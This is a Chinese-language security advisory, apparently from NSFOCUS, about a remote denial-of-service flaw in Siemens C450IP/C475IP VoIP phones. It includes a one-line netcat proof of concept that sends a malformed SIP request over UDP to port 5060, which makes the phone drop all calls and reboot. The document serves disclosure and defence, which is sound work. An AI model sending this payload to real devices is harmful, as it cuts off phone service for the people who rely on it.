安全研究

安全漏洞
Siemens C450IP/C475IP电话远程拒绝服务漏洞

发布日期:2008-11-24
更新日期:2008-11-28

受影响系统:
Siemens C450IP/C475IP
描述:
BUGTRAQ  ID: 32451

Siemens C450IP和C475IP都是流行的VOIP电话设备。

设备在处理畸形请求数据时存在漏洞,如果远程攻击者向电话的5060端口发送了特制的UDP报文的话,就会导致设备断开所有呼叫并重启。

<*来源:Martin Kluge
  
  链接:http://secunia.com/advisories/32827/
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

echo -e "X sip:s X\nFrom:<sip:@x>\nTo:<sip:@x>\n" | nc -q0 -u <target> 5060

建议:
厂商补丁:

Siemens
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://gigaset.com/shc/0,1935,hq_en_0_122378_rarnrnrnrn,00.html
http://gigaset.com/shc/0,1935,hq_en_0_145533_rArNrNrNrN_pageType%253ADescription,00.html

浏览次数:2627
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障